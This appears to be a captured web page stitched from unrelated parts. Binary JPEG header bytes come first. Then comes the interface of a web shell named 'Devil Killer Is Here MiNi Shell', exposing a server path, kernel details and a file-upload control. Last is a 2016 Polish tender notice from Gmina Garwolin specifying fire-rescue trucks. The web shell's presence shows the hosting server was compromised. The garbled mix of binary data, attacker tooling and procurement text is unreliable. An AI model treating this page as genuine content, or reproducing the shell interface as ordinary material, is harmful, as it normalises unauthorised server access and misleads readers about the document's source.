JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161005/317947-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 317947 - 2016
              z dnia 2016-10-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Garwolin: Zakup średnich samochodów ratowniczo  gaśniczych na potrzeby jednostek OSP z terenu Gminy Garwolin<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Mazowiecka Jednostka Wdrażania Programów Unijnych w ramach RPO WM na lata 2014-2020 w osi  Gospodarka przyjazna Środowisku działanie 5.1 Dostosowanie do zmian klimatu</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Gminy Garwolin, krajowy numer identyfikacyjny
              53622600000, ul.
              ul. Mazowiecka 
              16,
              08400  
              Garwolin, woj.
              mazowieckie, państwo
              , tel.
              025 6820560 w. 57, e-mail
              urzad@garwolin-gmina.pl, faks
              256 820 567.
              <br />
              Adres strony internetowej (URL): www.garwoln-gmina.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />ww.garwoln-gmina.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.garwoln-gmina.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup średnich samochodów ratowniczo  gaśniczych na potrzeby jednostek OSP z terenu Gminy Garwolin<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>
WYMAGANIA    ZAMAWIAJĄCEGO
I.	WYMAGANIA PODSTAWOWE
1.1	Pojazd powinien spełniać wymagania polskich przepisów o ruchu drogowym zgodnie z Ustawą Prawo o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych
1.2	Pojazd powinien spełniać przepisy Polskiej Normy PN-EN-1846-3
1.3	Pojazd powinien spełniać minimalne Wymagania techniczno-użytkowe dla wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, wprowadzanych do użytkowania w jednostkach ochrony przeciwpożarowej - rozporządzenie Ministra Spraw Wewnętrznych i Administracji - Dz.U. Nr 143 poz. 1002 z 2007r i rozporządzenie zmieniające - Dz.U. Nr 85 poz. 553 z 2010r.
1.4	Samochód musi posiadać świadectwo dopuszczenia wyrobu, do stosowania w jednostkach ochrony przeciwpożarowej wydany przez polską jednostkę certyfikującą.
Świadectwo ważne na dzień odbioru samochodu.
Należy potwierdzić spełnienie wymagań i załączyć kompletne świadectwo dopuszczenia  przy odbiorze samochodu (dwie strony).
1.5	Aktualne świadectwo dopuszczenia wydane przez CNBOP dołączone do ofert.
II.	                PODWOZIE Z KABINĄ
2.1	Maksymalna masa rzeczywista  samochodu gotowego do  akcji ratowniczo-gaśniczej (pojazd z załogą, pełnymi zbiornikami, zabudową i wyposażeniem) - nie może przekroczyć 16 000 kg
2.2	Samochód wyposażony w silnik wysokoprężny o mocy min. 320kW. Prędkość ograniczona elektronicznie do 100 km/h
2.3	Samochód fabrycznie nowy, rok produkcji zabudowy 2016 r., rok produkcji podwozia minimum 2015
(Podać markę, typ i model)
2.4	Samochód wyposażony w podwozie drogowe w układzie napędowym:
 4x4  terenowy
	przekładnią rozdzielczą z możliwością wyboru przełożeń  szosowych i trenowych;
	blokadą mechanizmu różnicowego osi tylnej, osi przedniej  oraz międzyosiowego;
	stały napęd obu osi
	na osi przedniej koła pojedyncze, na osi tylnej  koła pojedyncze;
	Ogumienie, z bieżnikiem terenowym dostosowanym do różnych warunków atmosferycznych (wielosezonowe). Pełnowymiarowe koło zapasowe bez konieczności stałego przewożenia w samochodzie.
	skrzynia biegów-manualna 6 biegowa plus wsteczny; 
	system  ABS - z możliwością odłączenia podczas  jazdy w  tereniesposób odłączania w gestii Wykonawcy;  
	pojemność zbiornika paliwa min. 120 l.     
2.5	Samochód wyposażony w silnik o zapłonie samoczynnym, posiadający aktualne normy ochrony środowiska (czystości spalin) spełniający  normę emisji spalin - min. Euro 6.
2.6	Zawieszenie osi przedniej:
	mechaniczne - resory paraboliczne,
	amortyzatory teleskopowe,
	stabilizatory przechyłów. 

Zawieszenie osi tylnej:
	mechaniczne - resory paraboliczne,
	stabilizatory przechyłów. 
2.7	Kabina czterodrzwiowa, jednomodułowa, z szkieletem z blachy cynkowanej zapewniająca dostęp do silnika z podwójnym systemem zabezpieczającym przed jej przypadkowym odchyleniem w czasie jazdy, o układzie miejsc 1 + 1 + 4 (siedzenia przodem do kierunku jazdy). Kabina posiada przednią szybę klejoną, pozostałe ze szkła bezodpryskowego. Podłoga kabiny musi mieć powierzchnię antypoślizgową. Przestrzeń pomiędzy maksymalnie odsuniętym do tyłu fotelem kierowcy a tylną ściana kabiny minimum 1100 mm. Wyklucza się możliwość zastosowania kabiny załogowej osiągniętej poprzez skręcenie kabiny dziennej z modułem kabiny brygadowej.
Kabina wyposażona w:
	klimatyzację;
	półka na mocowanie dodatkowego wyposażenia elektrycznego;
	niezależny układ ogrzewania, umożliwiający ogrzewanie kabiny przy wyłączonym silniku;
	reflektor pogorzeliskowy na zewnątrz kabiny z gniazdem elektrycznym z prawej strony;
	zewnętrzną osłonę przeciwsłoneczną z przodu  dachu kabiny;
	elektrycznie sterowane szyby po stronie kierowcy i dowódcy;
	elektrycznie sterowane lusterka po stronie kierowcy i dowódcy;
	lusterka zewnętrzne, elektrycznie podgrzewane (główne i szerokokątne);
	kamera cofania;
	dodatkowy panel sterowania zabudową;
	fotel dowódcy konwencjonalny
	lusterko rampowe  krawężnikowe z prawej strony;
	lusterko rampowe - dojazdowe, przednie; 
	poręcz do trzymania w tylnej części kabiny;
	wywietrznik dachowy.

Kabina wyposażona dodatkowo w:
	uchwyty na 4 aparaty oddechowe, umieszczone w oparciach tylnych siedzeń
(uchwyty na aparaty  nie powinny w znacznym stopniu zmniejszać  przestrzeni załogi i ograniczać powierzchni  siedziska),   
	odblokowanie każdego aparatu indywidualnie,
	dźwignia odblokowująca o konstrukcji uniemożliwiającej przypadkowe odblokowanie np. w czasie hamowania pojazdu,
	w przypadku gdy aparaty nie są przewożone, wstawienie oparć w miejscu mocowania aparatów,
	schowek pod siedzeniami w tylnej części kabiny.
2.8	Fotele wyposażone w bezwładnościowe pasy bezpieczeństwa. Siedzenia pokryte materiałem  łatwo zmywalnym,  o zwiększonej odporności na  ścieranie. Fotele wyposażone w zagłówki. 
Fotel dla kierowcy:
	z mechaniczna regulacją wysokości,
	z regulacją odległości całego fotela,
	z regulacją pochylenia oparcia. 
Fotel dla pasażera (dowódcy):
	z mechaniczną regulacją wysokości, 
	z regulacją odległości całego fotela,
	z  regulacją pochylenia oparcia.
2.9	W kabinie kierowcy  zamontowane następujące urządzenia:
	radiotelefon samochodowy o parametrach min: częstotliwość VHF 136-174 MHz, moc 1÷25 W, 
odstęp międzykanałowy 12,5 kHz, 
	radio z odtwarzaczem, 
	podest do ładowarek (radiostacji przenośnych) i latarek z wyłącznikiem.
2.10	Dodatkowe urządzenia zamontowane w kabinie:
	sygnalizacja otwarcia żaluzji skrytek i podestów, z alarmem dźwiękowym,
	sygnalizacja informująca o wysunięciu masztu, z alarmem dźwiękowym, 
	sygnalizacja załączonego gniazda ładowania i stan naładowania akumulatorów,
	główny wyłącznik oświetlenia skrytek, 
	sterowanie zraszaczami,  
	sterowanie niezależnym ogrzewaniem kabiny i przedziału  pracy autopompy,
	kontrolka włączenia autopompy,
	wskaźnik poziomu wody w zbiorniku,
	wskaźnik poziomu środka pianotwórczego w zbiorniku,
	wskaźnik  niskiego  ciśnienia,
	wskaźnik  wysokiego  ciśnienia.
2.11	Pojazd  wyposażony w urządzenie sygnalizacyjno - ostrzegawcze (świetlne), pojazdu uprzywilejowanego. Urządzenie akustyczne powinno umożliwiać podawanie komunikatów słownych. Głośnik lub głośniki o mocy  min. 100W.
Sterowanie przy pomocy manipulatora na elastycznym przewodzie ,zmiana modulacji dźwiękowej sygnału  poprzez klakson pojazdu, manipulator powinien być funkcjonalny, czytelny i posiadać wyraźne, podświetlane  oznaczenia trybu pracy w ciągu  dnia i nocy.
Wymagana funkcjonalność podstawowa:
	 załączenie sygnałów dźwiękowych i świetlnych jednym przyciskiem (pojedyncze krótkie naciśnięcie przycisku),
	wyłączenie sygnałów dźwiękowych,
	wyłączenie sygnałów dźwiękowych, świetlnych.   
Na dachu kabiny zamontowana, zespolona belka świetlana z napisem STRAŻ z głośnikiem, i dwie lampy niebieskie  LED, 
	dodatkowo 4 lampy sygnalizacyjne niebieskie  LED  z przodu pojazdu, na wysokości lusterek
	4 szt. halogenów dalekosiężnych montowanych na belce z przodu pojazdu
	z tyłu pojazdu kogut w technologii LED, 
	fala świetlna LED umieszczona na tylnej ścianie nadwozia,
	na ścianie dolnej tylnej nadwozia z lewej i prawej strony zamontowane  dwie  lampy zespolone  tylne                        z zabezpieczeniami ochronnymi.   
2.12	Instalacja elektryczna wyposażona w główny wyłącznik prądu.
2.13	Pojazd  wyposażony w integralny układ  do ładowania  akumulatorów z zewnętrznego  źródła ~230V, z gniazdem przyłączeniowym  z wtyczką i przewodem  umieszczonym po prawej stronie.
 
2.14	Pojazd  wyposażony w zewnętrzne szybkozłącze do uzupełniania powietrza w układzie pneumatycznym z sieci stacjonarnej. Umieszczone po stronie kierowcy przy wejściu do kabiny.
  2.15	Pojazd  wyposażony w sygnalizację świetlną i dźwiękową włączonego biegu wstecznego (jako sygnalizację świetlną dopuszcza się światło cofania).
2.16	Pojazd  wyposażony w sygnał pneumatyczny, włączany dodatkowym włącznikiem z miejsca dostępnego dla kierowcy i dowódcy
2.17
	Pojazd wyposażony w hak holowniczy, paszczowy typu Ringfeder, Rockinger  lub równoważny, przystosowany do ciągnięcia przyczep, zgodnie z homologacją podwozia, o masie min. 10 ton. Wraz z elektrycznymi gniazdami przyłączeniowych i pneumatycznymi oraz gniazdo ABS  muszą współpracować z przyczepą.

2.18	Pełnowymiarowe koło zapasowe  na wyposażeniu pojazdu-dopuszcza się brak stałego mocowania w pojeździe                                                                                                                                   
2.19	Kolory samochodu:
	elementy podwozia, rama  w kolorze czarnym lub zbliżonym, 
	błotniki i zderzaki  w kolorze białym,
	żaluzje skrytek  w kolorze naturalnym aluminium,
	kabina, zabudowa w kolorze czerwonym RAL 3000.
III.	                ZABUDOWA POŻARNICZA  
3.1	Maksymalna wysokość całkowita pojazdu - 3300mm - dostosowana do wysokości bramy garażowej. Konstrukcja i poszycie zewnętrzne, wykonane ze stali nierdzewnej i aluminium. Wewnętrzne poszycia skrytek wyłożone  anodowaną  gładką blachą aluminiową. Po trzy skrytki na bokach pojazdu (w układzie 3+3+1). Pomiędzy kabiną,                       a zabudową pożarniczą zamontowana kompozytowa osłona ochronno-maskująca.
3.2	Wymagane otwierane lub wysuwne podesty pod wszystkimi schowkami bocznymi zabudowy, które  umożliwią   łatwy i bezpieczny  dostęp do sprzętu położonego w górnych partiach schowków, na całej długości zabudowy.
Musi być zainstalowany podest otwierany lub wysuwny  nad kołami tylnymi po obu stronach zabudowy.   
3.3	Otwarcie lub wysunięcie podestu, musi być sygnalizowane w kabinie kierowcy. 
Otwierane lub wysuwne podesty poza obrys pojazdu, muszą  posiadać oznakowanie ostrzegawcze
3.4	Skrytki na sprzęt i przedział autopompy wysokociśnieniowej  wyposażone w oświetlenie, podwójne listwy - LED, umieszczone pionowo po obu stronach schowka, przy prowadnicy żaluzji, włączane automatycznie po otwarciu  drzwi - żaluzji skrytki. W kabinie zamontowana sygnalizacja otwarcia skrytek. Główny wyłącznik oświetlenia skrytek, zainstalowany w kabinie kierowcy.
3.5	Pojazd posiada oświetlenie pola pracy wokół samochodu:
	oświetlenie składające się z lamp bocznych do oświetlenia bliskiego i dalszego pola pracy mocowane na bokach pojazdu (min. 3 szt. na stronę),
	oświetlenie powierzchni dachu, lampami typu LED,
	oświetlenia włączane z przedziału autopompy,   
	 W kabinie musi być zainstalowany włącznik do  załączenia oświetlenia zewnętrznego, z możliwością   sterowania  oświetleniem z tablicy autopompy.
3.6	Szuflady i wysuwane tace  automatycznie, blokują się w pozycji wsuniętej i całkowicie wysuniętej i posiadają zabezpieczenie  przed całkowitym wyciągnięciem.
Szuflady i tace wystające w pozycji otwartej powyżej 250 mm poza obrys pojazdu, posiadają  oznakowanie ostrzegawcze. Uchwyt klamki urządzeń samochodu, drzwi żaluzjowych, szuflad, tac, muszą być tak skonstruowane, aby umożliwiały ich obsługę w rękawicach.
3.7	Półki sprzętowe wykonane z aluminium, w systemie z możliwością regulacji położenia (ustawienia) wysokości półek - w zależności od potrzeb użytkownika.
3.8	Schowki wyposażone w regały, palety wysuwne lub obrotowe: na urządzenie ratownicze, agregat prądotwórczy, sprzęt ratowniczy, w zależności od potrzeb i możliwości  zamontowania danego sprzętu. 
3.9	Skrytki na sprzęt i wyposażenie zamykane żaluzjami aluminiowymi. Drzwi żaluzjowe wyposażone w zamki, jeden klucz pasuje do wszystkich zamków. Wymagane dodatkowe zabezpieczenie przed otwarciem żaluzji - typu rurkowego.
3.10	Dach zabudowy  wykonany w formie podestu roboczego w wykonaniu antypoślizgowym. 
3.11	Na dachu pojazdu zamontowana zamykana skrzynia aluminiowa na drobny sprzęt o wymiarach w przybliżeniu 1400x460x270 mm (wymiar zostanie potwierdzony na inspekcji produkcyjnej pojazdu) oraz uchwyty na drabiny nasadkowe, uchwyty na węże ssawne, bosak, mostki przejazdowe, tłumice itp.
3.12	Pojazd posiada drabinkę do wejścia na dach z tyłu samochodu, wykonana z materiałów nierdzewnych,   umieszczoną po prawej stronie. W górnej części drabinki zamontowane poręcze ułatwiające wchodzenie. 
3.13	Powierzchnie platform, podestów roboczych i podłogi  kabiny w wykonaniu antypoślizgowym.
3.14	Zbiornik wody wykonany ze stali nierdzewnej, usytuowany wzdłużnie, wyposażony w oprzyrządowanie umożliwiające jego bezpieczną eksploatację z układem zabezpieczającym przed wypływem wody w czasie jazdy. Zbiornik powinien:
- posiadać właz rewizyjny typu szybko otwieralnego dostępny z dachu,
- pojemność  min. 3500 l (+/-1%),
- nadciśnienie testowe 20 kPa,
- umieszczony być na ramie zabudowy elastycznie (np. na elementach metalowo-gumowych),
- wyklucza się montaż zbiornika za pomocą pasów sciągających,
- posiadać dolny otwór umożliwiający czyszczenie o średnicy 75mm,
- posiadać nasadę 1X75 z zaworem do napełniania zbiornika z hydrantu.
3.15	Autopompa zlokalizowana z tyłu pojazdu w przedziale zamykanym drzwiami żaluzjowymi. Wszystkie elementy układu wodno pianowego muszą być odporne na korozję i działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów. Konstrukcja układu wodno-pianowego powinna umożliwić jego całkowite odwodnienie.
3.16	Zbiornik środka pianotwórczego o pojemności min. 10 % pojemności zbiornika wody i nadciśnieniu testowym 20 kPa, oraz:
- powinien być odporny na działanie dopuszczonych do stosowania środków pianotwórczych,
- powinienem być wyposażony w oprzyrządowanie zapewniające jego bezpieczną eksploatację,
- napełnianie zbiornika powinno być możliwe z poziomu terenu i z dachu pojazdu.
3.17	Autopompa dwuzakresowa o wydajności:
- w przedziale 2600 - 2800 l/min przy ciśnieniu 0,8 MPa i głębokości ssania 1,5 m,
- min. 450 l/min. przy ciśnieniu 4 MPa. 
Autopompa musi umożliwiać jednoczesne podawanie wody ze stopnia niskiego i wysokiego ciśnienia. Mechaniczna zmiana stopnia ciśnienia pompy, wyklucza się możliwość załączania stopnia wysokiego ciśnienia za pomocą zdalnie sterowanych zaworów.
Autopompa smarowana olejami i smarami stałymi w celu poprawnego funkcjonowania. Wyklucza się konieczność uzupełniania olejów i smarów pomiędzy okresami zalecanymi przez producenta, tzn. nie częściej niż 250 motogodzin lub co 12 miesięcy.
3.18	Autopompa musi umożliwiać podanie wody i wodnego roztworu środka pianotwórczego do min.:
- dwóch nasad tłocznych wielkości 75 zlokalizowanych na prawej i lewej stronie z tyłu pojazdu,
- wysokociśnieniowej linii szybkiego natarcia,
- działka wodno-pianowego.
Na wlotach ssawnych i do napełniania zbiornika muszą być zamontowane elementy zabezpieczające przed przedostaniem się do układu wodno-pianowego  zanieczyszczeń stałych.
3.19	Układ wodno-pianowy zabudowany w taki sposób aby parametry autopompy przy zasilaniu ze zbiornika samochodu były nie mniejsze niż przy zasilaniu ze zbiornika zewnętrznego dla głębokości ssania 1,5 m oraz musi być wyposażona w automatycznie uruchamiane urządzenie odpowietrzające, umożliwiające zassanie wody z głębokości 1,5 m w czasie do 30 s, a z głębokości 7,5 m w czasie do 60 sekund.
3.20	Układ wodno - pianowy  wyposażony w ręczny lub automatyczny dozownik środka pianotwórczego dostosowany do wydajności autopompy, zapewniający uzyskiwanie co najmniej  stężeń 3% i 6% (tolerancja + 0,5%) w całym zakresie pracy.   
3.21	Na wlocie ssawnym autopompy,  zamontowany element zabezpieczający przed przedostaniem się do pompy zanieczyszczeń stałych zarówno przy ssaniu ze zbiornika zewnętrznego jak i ze zbiornika własnego pojazdu, gwarantujący bezpieczną eksploatację pompy.
3.22	Wszystkie elementy układu wodno-pianowego, odporne na korozję i działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów.
3.23	W przedziale autopompy  znajdują się co najmniej następujące urządzenia kontrolno - sterownicze pracy pompy:
	Manowakuometr,
	manometr niskiego ciśnienia,
	manometr wysokiego ciśnienia, 
	wskaźnik poziomu wody w zbiorniku samochodu,
	wskaźnik poziomu środka pianotwórczego w zbiorniku,
	regulator prędkości obrotowej silnika pojazdu,
	miernik prędkości obrotowej wału pompy,
	wyłącznik silnika pojazdu,
	kontrolka ciśnienia oleju i temperatury cieczy chłodzącej silnik,
	kontrolka włączenia autopompy,
	licznik motogodzin-pracy autopompy.

W przedziale autopompy należy, zamontować zespół:
	sterowania automatycznym  układem utrzymywania stałego ciśnienia tłoczenia, umożliwiający sterowanie                z regulacją automatyczną i ręczną ciśnienia pracy,
	sterownia automatycznym zaworem napełniania hydrantowego zabezpieczającym przed przepełnieniem zbiornika wodnego z możliwością przełączenia na pracę ręczną,
	sterowania ręcznym lub automatycznym układem dozowania środka pianotwórczego w całym zakresie pracy autopompy. 
3.24	Przedział pracy autopompy wyposażony w dodatkowy zewnętrzny głośnik z mikrofonem, połączony                              z radiotelefonem samochodowym.
3.25	Przedział pracy autopompy  wyposażony w system ogrzewania  działający niezależnie od pracy silnika. Montaż sterowania ogrzewaniem z kabiny kierowcy.
3.26	W przedziale pracy  autopompy, na tablicy sterującej, wymagane są zamontowane włączniki do uruchamiania silnika pojazdu oraz wyłączania silnika pojazdu. Włączniki muszą być aktywne  przy neutralnej pozycji skrzyni biegów i załączonym ręcznym hamulcu postojowym.
3.27	Działko wodno-pianowe o regulowanej wydajności, umieszczone na dachu pojazdu z nakładką do piany. Wydajność działka min. 1600 l /min. przy podstawie działka zamontowany zawór odcinający. Dopuszcza się zastosowanie  zaworu odcinającego ze sterowaniem elektryczno-pneumatycznym. 
